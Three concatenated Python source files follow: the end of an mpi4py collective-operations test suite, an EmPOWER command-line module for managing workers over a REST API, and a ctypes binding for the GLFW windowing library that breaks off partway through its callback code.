size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for op in (MPI.SUM, MPI.PROD,
MPI.MAX, MPI.MIN,
MPI.MAXLOC, MPI.MINLOC,
MPI.REPLACE, MPI.NO_OP):
if op == MPI.OP_NULL: continue
if op in (MPI.MAXLOC, MPI.MINLOC):
sendobj = (rank, rank)
else:
sendobj = rank
value = self.COMM.allreduce(sendobj, op)
if op == MPI.SUM:
self.assertEqual(value, cumsum(range(size)))
elif op == MPI.PROD:
self.assertEqual(value, cumprod(range(size)))
elif op == MPI.MAX:
self.assertEqual(value, size-1)
elif op == MPI.MIN:
self.assertEqual(value, 0)
elif op == MPI.MAXLOC:
self.assertEqual(value[1], size-1)
elif op == MPI.MINLOC:
self.assertEqual(value[1], 0)
elif op == MPI.REPLACE:
self.assertEqual(value, size-1)
elif op == MPI.NO_OP:
self.assertEqual(value, 0)
def testScan(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
# --
sscan = self.COMM.scan(size, op=MPI.SUM)
self.assertEqual(sscan, cumsum([size]*(rank+1)))
# --
rscan = self.COMM.scan(rank, op=MPI.SUM)
self.assertEqual(rscan, cumsum(range(rank+1)))
# --
minloc = self.COMM.scan((rank, rank), op=MPI.MINLOC)
maxloc = self.COMM.scan((rank, rank), op=MPI.MAXLOC)
self.assertEqual(minloc, (0, 0))
self.assertEqual(maxloc, (rank, rank))
# --
if MPI.REPLACE != MPI.OP_NULL:
rscan = self.COMM.scan(rank, op=MPI.REPLACE)
self.assertEqual(rscan, rank)
# --
if MPI.NO_OP != MPI.OP_NULL:
rscan = self.COMM.scan(rank, op=MPI.NO_OP)
self.assertEqual(rscan, 0)
def testExscan(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
# --
sscan = self.COMM.exscan(size, op=MPI.SUM)
if rank == 0:
self.assertTrue(sscan is None)
else:
self.assertEqual(sscan, cumsum([size]*(rank)))
# --
rscan = self.COMM.exscan(rank, op=MPI.SUM)
if rank == 0:
self.assertTrue(rscan is None)
else:
self.assertEqual(rscan, cumsum(range(rank)))
# --
minloc = self.COMM.exscan((rank, rank), op=MPI.MINLOC)
maxloc = self.COMM.exscan((rank, rank), op=MPI.MAXLOC)
if rank == 0:
self.assertEqual(minloc, None)
self.assertEqual(maxloc, None)
else:
self.assertEqual(minloc, (0, 0))
self.assertEqual(maxloc, (rank-1, rank-1))
# --
if MPI.REPLACE != MPI.OP_NULL:
rscan = self.COMM.exscan(rank, op=MPI.REPLACE)
if rank == 0:
self.assertTrue(rscan is None)
else:
self.assertEqual(rscan, rank-1)
# --
if MPI.NO_OP != MPI.OP_NULL:
rscan = self.COMM.exscan(rank, op=MPI.NO_OP)
if rank == 0:
self.assertTrue(rscan is None)
else:
self.assertEqual(rscan, 0)
class TestCCOObjSelf(BaseTestCCOObj, unittest.TestCase):
COMM = MPI.COMM_SELF
class TestCCOObjWorld(BaseTestCCOObj, unittest.TestCase):
COMM = MPI.COMM_WORLD
class TestCCOObjSelfDup(TestCCOObjSelf):
def setUp(self):
self.COMM = MPI.COMM_SELF.Dup()
def tearDown(self):
self.COMM.Free()
class TestCCOObjWorldDup(TestCCOObjWorld):
def setUp(self):
self.COMM = MPI.COMM_WORLD.Dup()
def tearDown(self):
self.COMM.Free()
name, version = MPI.get_vendor()
if name == 'Open MPI':
if version < (1,4,0):
if MPI.Query_thread() > MPI.THREAD_SINGLE:
del TestCCOObjWorldDup
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python3
#
# Copyright (c) 2019 Roberto Riggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Workers CLI tools."""
import uuid
import argparse
import empower.cli.command as command
def do_list_workers(gargs, args, leftovers):
"""List currently running workers. """
_, data = command.connect(gargs, ('GET', '/api/v1/workers'), 200)
for entry in data.values():
accum = []
accum.append("worker_id ")
accum.append(entry['service_id'])
accum.append(" name ")
accum.append(entry['name'])
print(''.join(accum))
def do_list_workers_catalog(gargs, args, leftovers):
"""List workers that can be loaded. """
_, data = command.connect(gargs, ('GET', '/api/v1/catalog'), 200)
for entry in data.values():
accum = []
accum.append("name ")
accum.append(entry['name'])
accum.append("\n")
accum.append(" desc: ")
accum.append(entry['desc'])
accum.append("\n params:")
for k, val in entry['params'].items():
if k in ('service_id', 'project_id'):
continue
accum.append("\n %s: %s" % (k, val['desc']))
if 'default' in val:
accum.append(" Default: %s." % val['default'])
accum.append(" Type: %s." % val['type'])
accum.append(" Mandatory: %s." % val['mandatory'])
print(''.join(accum))
def pa_load_worker(args, cmd):
"""Load application parser method. """
usage = "%s <options>" % command.USAGE.format(cmd)
desc = command.DESCS[cmd]
parser = argparse.ArgumentParser(usage=usage, description=desc)
required = parser.add_argument_group('required named arguments')
required.add_argument('-n', '--name', help='The app name',
required=True, type=str, dest="name")
(args, leftovers) = parser.parse_known_args(args)
return args, leftovers
def do_load_worker(gargs, args, leftovers):
"""Load and application. """
request = {
"version": "1.0",
"name": args.name,
"params": command.get_params(leftovers)
}
headers = command.get_headers(gargs)
url = '/api/v1/workers'
response, _ = command.connect(gargs, ('POST', url), 201, request,
headers=headers)
location = response.headers['Location']
tokens = location.split("/")
worker_id = tokens[-1]
url = '/api/v1/workers/%s' % worker_id
_, data = command.connect(gargs, ('GET', url), 200, headers=headers)
print(data['service_id'])
def pa_unload_worker(args, cmd):
"""Unload application parser method. """
usage = "%s <options>" % command.USAGE.format(cmd)
desc = command.DESCS[cmd]
parser = argparse.ArgumentParser(usage=usage, description=desc)
required = parser.add_argument_group('required named arguments')
required.add_argument('-a', '--worker_id', help='The worker id',
required=True, type=uuid.UUID, dest="worker_id")
(args, leftovers) = parser.parse_known_args(args)
return args, leftovers
def do_unload_worker(gargs, args, _):
"""Unload and application. """
url = '/api/v1/workers/%s' % args.worker_id
command.connect(gargs, ('DELETE', url), 204)
print(args.worker_id)
def do_unload_all_workers(gargs, args, leftovers):
"""Unload and application. """
headers = command.get_headers(gargs)
url = '/api/v1/workers'
_, data = command.connect(gargs, ('GET', url), 200, headers=headers)
for entry in data.values():
worker_id = entry['service_id']
url = '/api/v1/workers/%s' % worker_id
command.connect(gargs, ('DELETE', url), 204, headers=headers)
print(worker_id)
def pa_set_worker_params(args, cmd):
"""Set worker param parser method. """
usage = "%s <options>" % command.USAGE.format(cmd)
desc = command.DESCS[cmd]
parser = argparse.ArgumentParser(usage=usage, description=desc)
required = parser.add_argument_group('required named arguments')
required.add_argument('-a', '--worker_id', help='The worker id',
required=True, type=uuid.UUID, dest="worker_id")
(args, leftovers) = parser.parse_known_args(args)
return args, leftovers
def do_set_worker_params(gargs, args, leftovers):
"""Set worker parameters. """
request = {
"version": "1.0",
"params": command.get_params(leftovers)
}
print(request)
headers = command.get_headers(gargs)
url = '/api/v1/workers/%s' % args.worker_id
command.connect(gargs, ('PUT', url), 204, request, headers=headers)
url = '/api/v1/workers/%s' % args.worker_id
_, data = command.connect(gargs, ('GET', url), 200, headers=headers)
accum = []
accum.append("worker_id ")
accum.append(data['service_id'])
accum.append("\n name ")
accum.append(data['name'])
accum.append("\n params:")
for k, val in data['params'].items():
accum.append("\n %s: %s" % (k, val))
print(''.join(accum))
|
|
# -----------------------------------------------------------------------------
# GLFW - An OpenGL framework
# API version: 3.0.1
# WWW: http://www.glfw.org/
# ----------------------------------------------------------------------------
# Copyright (c) 2002-2006 Marcus Geelnard
# Copyright (c) 2006-2010 Camilla Berglund
#
# Python bindings - Copyright (c) 2013 Nicolas P. Rougier
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
#
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
#
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would
# be appreciated but is not required.
#
# 2. Altered source versions must be plainly marked as such, and must not
# be misrepresented as being the original software.
#
# 3. This notice may not be removed or altered from any source
# distribution.
#
# ----------------
# changes by moritz kassner:
# small bugfixes, changed binary loading routine.
# Upgrade to 3.1.x api.
# -----------------------------------------------------------------------------
import sys,os
import ctypes
from ctypes import c_int,c_ushort,c_char_p,c_double,c_uint, c_char,Structure,CFUNCTYPE,byref,POINTER
import platform
from ctypes.util import find_library
os_name = platform.system()
del platform
if getattr(sys, 'frozen', False):
# we are running in a |PyInstaller| bundle using a local version
# you will need to add glfw.so/dylib in your spec file.
if os_name == "Linux":
filename = 'libglfw.so'
elif os_name == "Darwin":
filename = 'libglfw3.dylib'
elif os_name == "Windows":
filename = 'glfw3.dll'
else:
filename = 'libglfw.dll'
dll_path = os.path.join(sys._MEIPASS,filename)
else:
# we are running in a normal Python environment
if os_name == "Linux":
dll_path = find_library('glfw')
elif os_name == "Darwin":
dll_path = find_library('glfw3')
elif os_name == "Windows":
dll_path = os.path.join(os.path.dirname(os.path.abspath(os.path.curdir)), 'shared_modules', 'external', 'glfw3')
else:
dll_path = find_library('glfw')
if not dll_path:
raise RuntimeError, 'GLFW library not found'
_glfw = ctypes.CDLL(dll_path)
# --- Version -----------------------------------------------------------------
GLFW_VERSION_MAJOR = 3
GLFW_VERSION_MINOR = 1
GLFW_VERSION_REVISION = 1
__version__ = GLFW_VERSION_MAJOR, GLFW_VERSION_MINOR, GLFW_VERSION_REVISION
# --- Input handling definitions ----------------------------------------------
GLFW_RELEASE = 0
GLFW_PRESS = 1
GLFW_REPEAT = 2
# --- Keys --------------------------------------------------------------------
# --- The unknown key ---------------------------------------------------------
GLFW_KEY_UNKNOWN = -1
# --- Printable keys ----------------------------------------------------------
GLFW_KEY_SPACE = 32
GLFW_KEY_APOSTROPHE = 39 # ''
GLFW_KEY_COMMA = 44 # ,
GLFW_KEY_MINUS = 45 # -
GLFW_KEY_PERIOD = 46 # .
GLFW_KEY_SLASH = 47 # /
GLFW_KEY_0 = 48
GLFW_KEY_1 = 49
GLFW_KEY_2 = 50
GLFW_KEY_3 = 51
GLFW_KEY_4 = 52
GLFW_KEY_5 = 53
GLFW_KEY_6 = 54
GLFW_KEY_7 = 55
GLFW_KEY_8 = 56
GLFW_KEY_9 = 57
GLFW_KEY_SEMICOLON = 59 # ;
GLFW_KEY_EQUAL = 61 # =
GLFW_KEY_A = 65
GLFW_KEY_B = 66
GLFW_KEY_C = 67
GLFW_KEY_D = 68
GLFW_KEY_E = 69
GLFW_KEY_F = 70
GLFW_KEY_G = 71
GLFW_KEY_H = 72
GLFW_KEY_I = 73
GLFW_KEY_J = 74
GLFW_KEY_K = 75
GLFW_KEY_L = 76
GLFW_KEY_M = 77
GLFW_KEY_N = 78
GLFW_KEY_O = 79
GLFW_KEY_P = 80
GLFW_KEY_Q = 81
GLFW_KEY_R = 82
GLFW_KEY_S = 83
GLFW_KEY_T = 84
GLFW_KEY_U = 85
GLFW_KEY_V = 86
GLFW_KEY_W = 87
GLFW_KEY_X = 88
GLFW_KEY_Y = 89
GLFW_KEY_Z = 90
GLFW_KEY_LEFT_BRACKET = 91 # [
GLFW_KEY_BACKSLASH = 92 # \
GLFW_KEY_RIGHT_BRACKET = 93 # ]
GLFW_KEY_GRAVE_ACCENT = 96 # `
GLFW_KEY_WORLD_1 = 161 # non-US #1
GLFW_KEY_WORLD_2 = 162 # non-US #2
# --- Function keys -----------------------------------------------------------
GLFW_KEY_ESCAPE = 256
GLFW_KEY_ENTER = 257
GLFW_KEY_TAB = 258
GLFW_KEY_BACKSPACE = 259
GLFW_KEY_INSERT = 260
GLFW_KEY_DELETE = 261
GLFW_KEY_RIGHT = 262
GLFW_KEY_LEFT = 263
GLFW_KEY_DOWN = 264
GLFW_KEY_UP = 265
GLFW_KEY_PAGE_UP = 266
GLFW_KEY_PAGE_DOWN = 267
GLFW_KEY_HOME = 268
GLFW_KEY_END = 269
GLFW_KEY_CAPS_LOCK = 280
GLFW_KEY_SCROLL_LOCK = 281
GLFW_KEY_NUM_LOCK = 282
GLFW_KEY_PRINT_SCREEN = 283
GLFW_KEY_PAUSE = 284
GLFW_KEY_F1 = 290
GLFW_KEY_F2 = 291
GLFW_KEY_F3 = 292
GLFW_KEY_F4 = 293
GLFW_KEY_F5 = 294
GLFW_KEY_F6 = 295
GLFW_KEY_F7 = 296
GLFW_KEY_F8 = 297
GLFW_KEY_F9 = 298
GLFW_KEY_F10 = 299
GLFW_KEY_F11 = 300
GLFW_KEY_F12 = 301
GLFW_KEY_F13 = 302
GLFW_KEY_F14 = 303
GLFW_KEY_F15 = 304
GLFW_KEY_F16 = 305
GLFW_KEY_F17 = 306
GLFW_KEY_F18 = 307
GLFW_KEY_F19 = 308
GLFW_KEY_F20 = 309
GLFW_KEY_F21 = 310
GLFW_KEY_F22 = 311
GLFW_KEY_F23 = 312
GLFW_KEY_F24 = 313
GLFW_KEY_F25 = 314
GLFW_KEY_KP_0 = 320
GLFW_KEY_KP_1 = 321
GLFW_KEY_KP_2 = 322
GLFW_KEY_KP_3 = 323
GLFW_KEY_KP_4 = 324
GLFW_KEY_KP_5 = 325
GLFW_KEY_KP_6 = 326
GLFW_KEY_KP_7 = 327
GLFW_KEY_KP_8 = 328
GLFW_KEY_KP_9 = 329
GLFW_KEY_KP_DECIMAL = 330
GLFW_KEY_KP_DIVIDE = 331
GLFW_KEY_KP_MULTIPLY = 332
GLFW_KEY_KP_SUBTRACT = 333
GLFW_KEY_KP_ADD = 334
GLFW_KEY_KP_ENTER = 335
GLFW_KEY_KP_EQUAL = 336
GLFW_KEY_LEFT_SHIFT = 340
GLFW_KEY_LEFT_CONTROL = 341
GLFW_KEY_LEFT_ALT = 342
GLFW_KEY_LEFT_SUPER = 343
GLFW_KEY_RIGHT_SHIFT = 344
GLFW_KEY_RIGHT_CONTROL = 345
GLFW_KEY_RIGHT_ALT = 346
GLFW_KEY_RIGHT_SUPER = 347
GLFW_KEY_MENU = 348
GLFW_KEY_LAST = GLFW_KEY_MENU
# --- Modifiers ---------------------------------------------------------------
GLFW_MOD_SHIFT = 0x0001
GLFW_MOD_CONTROL = 0x0002
GLFW_MOD_ALT = 0x0004
GLFW_MOD_SUPER = 0x0008
# --- Mouse -------------------------------------------------------------------
GLFW_MOUSE_BUTTON_1 = 0
GLFW_MOUSE_BUTTON_2 = 1
GLFW_MOUSE_BUTTON_3 = 2
GLFW_MOUSE_BUTTON_4 = 3
GLFW_MOUSE_BUTTON_5 = 4
GLFW_MOUSE_BUTTON_6 = 5
GLFW_MOUSE_BUTTON_7 = 6
GLFW_MOUSE_BUTTON_8 = 7
GLFW_MOUSE_BUTTON_LAST = GLFW_MOUSE_BUTTON_8
GLFW_MOUSE_BUTTON_LEFT = GLFW_MOUSE_BUTTON_1
GLFW_MOUSE_BUTTON_RIGHT = GLFW_MOUSE_BUTTON_2
GLFW_MOUSE_BUTTON_MIDDLE = GLFW_MOUSE_BUTTON_3
# --- Joystick ----------------------------------------------------------------
GLFW_JOYSTICK_1 = 0
GLFW_JOYSTICK_2 = 1
GLFW_JOYSTICK_3 = 2
GLFW_JOYSTICK_4 = 3
GLFW_JOYSTICK_5 = 4
GLFW_JOYSTICK_6 = 5
GLFW_JOYSTICK_7 = 6
GLFW_JOYSTICK_8 = 7
GLFW_JOYSTICK_9 = 8
GLFW_JOYSTICK_10 = 9
GLFW_JOYSTICK_11 = 10
GLFW_JOYSTICK_12 = 11
GLFW_JOYSTICK_13 = 12
GLFW_JOYSTICK_14 = 13
GLFW_JOYSTICK_15 = 14
GLFW_JOYSTICK_16 = 15
GLFW_JOYSTICK_LAST = GLFW_JOYSTICK_16
# --- Error codes -------------------------------------------------------------
GLFW_NOT_INITIALIZED = 0x00010001
GLFW_NO_CURRENT_CONTEXT = 0x00010002
GLFW_INVALID_ENUM = 0x00010003
GLFW_INVALID_VALUE = 0x00010004
GLFW_OUT_OF_MEMORY = 0x00010005
GLFW_API_UNAVAILABLE = 0x00010006
GLFW_VERSION_UNAVAILABLE = 0x00010007
GLFW_PLATFORM_ERROR = 0x00010008
GLFW_FORMAT_UNAVAILABLE = 0x00010009
# ---
GLFW_FOCUSED = 0x00020001
GLFW_ICONIFIED = 0x00020002
GLFW_RESIZABLE = 0x00020003
GLFW_VISIBLE = 0x00020004
GLFW_DECORATED = 0x00020005
# ---
GLFW_RED_BITS = 0x00021001
GLFW_GREEN_BITS = 0x00021002
GLFW_BLUE_BITS = 0x00021003
GLFW_ALPHA_BITS = 0x00021004
GLFW_DEPTH_BITS = 0x00021005
GLFW_STENCIL_BITS = 0x00021006
GLFW_ACCUM_RED_BITS = 0x00021007
GLFW_ACCUM_GREEN_BITS = 0x00021008
GLFW_ACCUM_BLUE_BITS = 0x00021009
GLFW_ACCUM_ALPHA_BITS = 0x0002100A
GLFW_AUX_BUFFERS = 0x0002100B
GLFW_STEREO = 0x0002100C
GLFW_SAMPLES = 0x0002100D
GLFW_SRGB_CAPABLE = 0x0002100E
GLFW_REFRESH_RATE = 0x0002100F
# ---
GLFW_CLIENT_API = 0x00022001
GLFW_CONTEXT_VERSION_MAJOR = 0x00022002
GLFW_CONTEXT_VERSION_MINOR = 0x00022003
GLFW_CONTEXT_REVISION = 0x00022004
GLFW_CONTEXT_ROBUSTNESS = 0x00022005
GLFW_OPENGL_FORWARD_COMPAT = 0x00022006
GLFW_OPENGL_DEBUG_CONTEXT = 0x00022007
GLFW_OPENGL_PROFILE = 0x00022008
# ---
GLFW_OPENGL_API = 0x00030001
GLFW_OPENGL_ES_API = 0x00030002
# ---
GLFW_NO_ROBUSTNESS = 0
GLFW_NO_RESET_NOTIFICATION = 0x00031001
GLFW_LOSE_CONTEXT_ON_RESET = 0x00031002
# ---
GLFW_OPENGL_ANY_PROFILE = 0
GLFW_OPENGL_CORE_PROFILE = 0x00032001
GLFW_OPENGL_COMPAT_PROFILE = 0x00032002
# ---
GLFW_CURSOR = 0x00033001
GLFW_STICKY_KEYS = 0x00033002
GLFW_STICKY_MOUSE_BUTTONS = 0x00033003
# ---
GLFW_CURSOR_NORMAL = 0x00034001
GLFW_CURSOR_HIDDEN = 0x00034002
GLFW_CURSOR_DISABLED = 0x00034003
# ---
GLFW_CONNECTED = 0x00040001
GLFW_DISCONNECTED = 0x00040002
# --- Structures --------------------------------------------------------------
class GLFWvidmode(Structure):
_fields_ = [ ('width', c_int),
('height', c_int),
('redBits', c_int),
('greenBits', c_int),
('blueBits', c_int),
('refreshRate', c_int) ]
class GLFWgammaramp(Structure):
_fields_ = [ ('red', POINTER(c_ushort)),
('green', POINTER(c_ushort)),
('blue', POINTER(c_ushort)),
('size', c_int) ]
class GLFWwindow(Structure): pass
class GLFWmonitor(Structure): pass
# --- Callbacks ---------------------------------------------------------------
errorfun = CFUNCTYPE(None, c_int, c_char_p)
windowposfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int)
windowsizefun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int)
windowclosefun = CFUNCTYPE(None, POINTER(GLFWwindow))
windowrefreshfun = CFUNCTYPE(None, POINTER(GLFWwindow))
windowfocusfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int)
windowiconifyfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int)
framebuffersizefun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int)
mousebuttonfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int, c_int)
cursorposfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_double, c_double)
cursorenterfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int)
scrollfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_double, c_double)
keyfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int, c_int, c_int)
charfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_uint)
monitorfun = CFUNCTYPE(None, POINTER(GLFWmonitor), c_int)
dropfun = CFUNCTYPE(None, POINTER(GLFWmonitor), c_int, POINTER(c_char_p))
# --- Init --------------------------------------------------------------------
# glfwInit = _glfw.glfwInit
glfwTerminate = _glfw.glfwTerminate
#glfwGetVersion = _glfw.glfwGetVersion
glfwGetVersionString = _glfw.glfwGetVersionString
glfwGetVersionString.restype = c_char_p
# --- Error -------------------------------------------------------------------
#glfwSetErrorCallback = _glfw.glfwSetErrorCallback
# --- Monitor -----------------------------------------------------------------
# glfwGetMonitors = _glfw.glfwGetMonitors
# glfwGetMonitors.restype = POINTER(GLFWmonitor)
glfwGetPrimaryMonitor = _glfw.glfwGetPrimaryMonitor
glfwGetPrimaryMonitor.restype = POINTER(GLFWmonitor)
# glfwGetMonitorPos = _glfw.glfwGetMonitorPos
# glfwGetMonitorPhysicalSize = _glfw.glfwGetMonitorPhysicalSize
glfwGetMonitorName = _glfw.glfwGetMonitorName
glfwGetMonitorName.restype = c_char_p
# glfwSetMonitorCallback = _glfw.glfwSetMonitorCallback
# glfwGetVideoModes = _glfw.glfwGetVideoModes
# glfwGetVideoMode = _glfw.glfwGetVideoMode
# --- Gama --------------------------------------------------------------------
glfwSetGamma = _glfw.glfwSetGamma
# glfwGetGammaRamp = _glfw.glfwGetGammaRamp
# glfwSetGammaRamp = _glfw.glfwSetGammaRamp
# --- Window ------------------------------------------------------------------
glfwDefaultWindowHints = _glfw.glfwDefaultWindowHints
glfwWindowHint = _glfw.glfwWindowHint
# glfwCreateWindow = _glfw.glfwCreateWindow
# glfwDestroyWindow = _glfw.glfwDestroyWindow
glfwWindowShouldClose = _glfw.glfwWindowShouldClose
glfwSetWindowShouldClose = _glfw.glfwSetWindowShouldClose
glfwSetWindowTitle = _glfw.glfwSetWindowTitle
# glfwGetWindowPos = _glfw.glfwGetWindowPos
glfwSetWindowPos = _glfw.glfwSetWindowPos
# glfwGetWindowSize = _glfw.glfwGetWindowSize
glfwSetWindowSize = _glfw.glfwSetWindowSize
# glfwGetFramebufferSize = _glfw.glfwGetFramebufferSize
glfwIconifyWindow = _glfw.glfwIconifyWindow
glfwRestoreWindow = _glfw.glfwRestoreWindow
glfwShowWindow = _glfw.glfwShowWindow
glfwHideWindow = _glfw.glfwHideWindow
glfwGetWindowMonitor = _glfw.glfwGetWindowMonitor
glfwGetWindowAttrib = _glfw.glfwGetWindowAttrib
glfwSetWindowUserPointer = _glfw.glfwSetWindowUserPointer
glfwGetWindowUserPointer = _glfw.glfwGetWindowUserPointer
# glfwSetWindowPosCallback = _glfw.glfwSetWindowPosCallback
# glfwSetWindowSizeCallback = _glfw.glfwSetWindowSizeCallback
# glfwSetWindowCloseCallback = _glfw.glfwSetWindowCloseCallback
# glfwSetWindowRefreshCallback = _glfw.glfwSetWindowRefreshCallback
# glfwSetWindowFocusCallback = _glfw.glfwSetWindowFocusCallback
# glfwSetWindowIconifyCallback = _glfw.glfwSetWindowIconifyCallback
# glfwSetFramebufferSizeCallback = _glfw.glfwSetFramebufferSizeCallback
glfwPollEvents = _glfw.glfwPollEvents
glfwWaitEvents = _glfw.glfwWaitEvents
# --- Input -------------------------------------------------------------------
glfwGetInputMode = _glfw.glfwGetInputMode
glfwSetInputMode = _glfw.glfwSetInputMode
glfwGetKey = _glfw.glfwGetKey
glfwGetMouseButton = _glfw.glfwGetMouseButton
# glfwGetCursorPos = _glfw.glfwGetCursorPos
glfwSetCursorPos = _glfw.glfwSetCursorPos
# glfwSetKeyCallback = _glfw.glfwSetKeyCallback
# glfwSetCharCallback = _glfw.glfwSetCharCallback
# glfwSetMouseButtonCallback = _glfw.glfwSetMouseButtonCallback
# glfwSetCursorPosCallback = _glfw.glfwSetCursorPosCallback
# glfwSetCursorEnterCallback = _glfw.glfwSetCursorEnterCallback
# glfwSetScrollCallback = _glfw.glfwSetScrollCallback
glfwJoystickPresent = _glfw.glfwJoystickPresent
# glfwGetJoystickAxes = _glfw.glfwGetJoystickAxes
# glfwGetJoystickButtons = _glfw.glfwGetJoystickButtons
glfwGetJoystickName = _glfw.glfwGetJoystickName
glfwGetJoystickName.restype = c_char_p
# --- Clipboard ---------------------------------------------------------------
glfwSetClipboardString = _glfw.glfwSetClipboardString
glfwGetClipboardString = _glfw.glfwGetClipboardString
glfwGetClipboardString.restype = c_char_p
# --- Timer -------------------------------------------------------------------
glfwGetTime = _glfw.glfwGetTime
glfwGetTime.restype = c_double
glfwSetTime = _glfw.glfwSetTime
# --- Context -----------------------------------------------------------------
glfwMakeContextCurrent = _glfw.glfwMakeContextCurrent
# glfwGetCurrentContext = _glfw.glfwGetCurrentContext
glfwSwapBuffers = _glfw.glfwSwapBuffers
glfwSwapInterval = _glfw.glfwSwapInterval
glfwExtensionSupported = _glfw.glfwExtensionSupported
glfwGetProcAddress = _glfw.glfwGetProcAddress
# --- Pythonizer --------------------------------------------------------------
# This keeps track of current windows
__windows__ = []
# This is to prevent garbage collection on callbacks
__c_callbacks__ = {}
__py_callbacks__ = {}
def glfwInit():
import os
# glfw changes the directory,so we change it back.
cwd = os.getcwd()
# Initialize
_glfw.glfwInit()
# Restore the old cwd.
os.chdir(cwd)
del os
def glfwCreateWindow(width=640, height=480, title="GLFW Window", monitor=None, share=None):
_glfw.glfwCreateWindow.restype = POINTER(GLFWwindow)
window = _glfw.glfwCreateWindow(width,height,title,monitor,share)
__windows__.append(window)
index = __windows__.index(window)
__c_callbacks__[index] = {}
__py_callbacks__[index] = { 'errorfun' : None,
'monitorfun' : None,
'windowposfun' : None,
'windowsizefun' : None,
'windowclosefun' : None,
'windowrefreshfun' : None,
'windowfocusfun' : None,
'windowiconifyfun' : None,
'framebuffersizefun' : None,
'keyfun' : None,
'charfun' : None,
'mousebuttonfun' : None,
'cursorposfun' : None,
'cursorenterfun' : None,
'scrollfun' : None,
'dropfun' : None,}
return window
def glfwDestroyWindow(window):
index = __windows__.index(window)
#glfw 3.1 appears to require to the context to be destroyed to be current.
current = glfwGetCurrentContext()
glfwMakeContextCurrent(window)
_glfw.glfwDestroyWindow(window)
glfwMakeContextCurrent(current)
# We do not delete window from the list (or it would impact windows numbering)
# del __windows__[index]
del __c_callbacks__[index]
del __py_callbacks__[index]
def glfwGetVersion():
major, minor, rev = c_int(0), c_int(0), c_int(0)
_glfw.glfwGetVersion( byref(major), byref(minor), byref(rev) )
return major.value, minor.value, rev.value
def glfwGetWindowPos(window):
xpos, ypos = c_int(0), c_int(0)
_glfw.glfwGetWindowPos(window, byref(xpos), byref(ypos))
return xpos.value, ypos.value
def glfwGetCursorPos(window):
xpos, ypos = c_double(0), c_double(0)
_glfw.glfwGetCursorPos(window, byref(xpos), byref(ypos))
return xpos.value, ypos.value
def glfwGetWindowSize(window):
width, height = c_int(0), c_int(0)
_glfw.glfwGetWindowSize(window, byref(width), byref(height))
return width.value, height.value
def glfwGetCurrentContext():
_glfw.glfwGetCurrentContext.restype = POINTER(GLFWwindow)
return _glfw.glfwGetCurrentContext()
def glfwGetFramebufferSize(window):
width, height = c_int(0), c_int(0)
_glfw.glfwGetFramebufferSize(window, byref(width), byref(height))
return width.value, height.value
def glfwGetMonitors():
count = c_int(0)
_glfw.glfwGetMonitors.restype = POINTER(POINTER(GLFWmonitor))
c_monitors = _glfw.glfwGetMonitors( byref(count) )
return [c_monitors[i] for i in range(count.value)]
def glfwGetVideoModes(monitor):
count = c_int(0)
_glfw.glfwGetVideoModes.restype = POINTER(GLFWvidmode)
c_modes = _glfw.glfwGetVideoModes( monitor, byref(count) )
modes = []
for i in range(count.value):
modes.append( (c_modes[i].width,
c_modes[i].height,
c_modes[i].redBits,
c_modes[i].blueBits,
c_modes[i].greenBits,
c_modes[i].refreshRate ) )
return modes
def glfwGetMonitorPos(monitor):
xpos, ypos = c_int(0), c_int(0)
_glfw.glfwGetMonitorPos(monitor, byref(xpos), byref(ypos))
return xpos.value, ypos.value
def glfwGetMonitorPhysicalSize(monitor):
width, height = c_int(0), c_int(0)
_glfw.glfwGetMonitorPhysicalSize(monitor, byref(width), byref(height))
return width.value, height.value
def glfwGetVideoMode(monitor):
_glfw.glfwGetVideoMode.restype = POINTER(GLFWvidmode)
c_mode = _glfw.glfwGetVideoMode(monitor)
return (c_mode.contents.width,
c_mode.contents.height,
c_mode.contents.redBits,
c_mode.contents.blueBits,
c_mode.contents.greenBits,
c_mode.contents.refreshRate )
def GetGammaRamp(monitor):
_glfw.glfwGetGammaRamp.restype = POINTER(GLFWgammaramp)
c_gamma = _glfw.glfwGetGammaRamp(monitor).contents
gamma = {'red':[], 'green':[], 'blue':[]}
if c_gamma:
for i in range(c_gamma.size):
gamma['red'].append(c_gamma.red[i])
gamma['green'].append(c_gamma.green[i])
gamma['blue'].append(c_gamma.blue[i])
return gamma
def glfwGetJoystickAxes(joy):
count = c_int(0)
_glfw.glfwGetJoystickAxes.restype = POINTER(c_float)
c_axes = _glfw.glfwGetJoystickAxes(joy, byref(count))
axes = [c_axes[i].value for i in range(count)]
def glfwGetJoystickButtons(joy):
count = c_int(0)
_glfw.glfwGetJoystickButtons.restype = POINTER(c_int)
c_buttons = _glfw.glfwGetJoystickButtons(joy, byref(count))
buttons = [c_buttons[i].value for i in range(count)]
# --- Callbacks ---------------------------------------------------------------
def __callback__(name):
callback = 'glfwSet%sCallback' % name
fun = '%sfun' % name.lower()
code = """
def %(callback)s(window, callback = None):
index = __windows__.index(window)
old_callback = __py_callbacks__[index]['%(fun)s']
__py_callbacks__[index]['%(fun)s'] = callback
if callback: callback = %(fun)s(callback)
__c_callbacks__[index]['%(fun)s'] = callback
